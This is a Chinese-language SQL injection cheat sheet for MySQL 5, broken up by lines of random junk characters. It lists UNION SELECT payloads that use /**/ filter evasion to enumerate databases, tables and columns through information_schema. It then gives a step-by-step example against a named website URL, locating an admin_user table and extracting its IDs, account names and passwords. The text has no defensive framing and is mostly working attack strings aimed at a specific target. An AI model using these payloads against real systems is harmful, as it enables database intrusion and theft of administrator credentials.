查库; f% |' j8 c, b- o# |, X# {
' T/ b" M) v6 {3 W* o8 |
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*- L! l" ?! x0 u# p5 o3 e
' t+ o% Z3 G! F) N& {查表
" [$ N4 `3 a6 W& ]0 b0 @% I
: w( B, t) C) w8 r# yid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
0 i6 C" a' I- |) n$ D& T
/ \2 V u+ i2 h' A- A查段
; |7 J) v0 m/ L; l( m8 n$ k5 m* r. |1 w! B
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
1 K( P+ ]/ O6 l! `; m% g+ _8 I( \3 Z5 s$ d8 \6 c/ } f
8 p% w5 p( j+ U. m+ a9 r+ ?6 A
mysql5高级注入方法暴表. V' c( \ r5 F( W
9 z+ m6 }+ E$ f0 K; F% E& B例子如下:
* l- p1 L ]. Y- |. k' A( y& A
: c4 C- \: w% J) N% N2 \1.爆表
9 U' c8 }, v- b; W2 Chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)% ^3 r+ d/ J' [; P3 K
这样爆到第4个时出现了admin_user表。
1 S6 b/ C+ e$ K8 v2 n: }5 d
0 ~- W# O6 S7 T- U3 m2.暴字段
, `- i2 e! g4 u8 N2 a- v/ n& bhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
9 b6 R- E& `! t, H. k2 L
. L. ]5 V4 K, J$ U& O/ A3 |& f+ y
3.爆密码
C; m0 j7 ^* nhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* - V2 @+ f7 M; s7 O% }( P1 X% m
( G7 [3 w6 c$ ?, D, A! ]& ?( u7 }! X2 D' }+ G {& r
|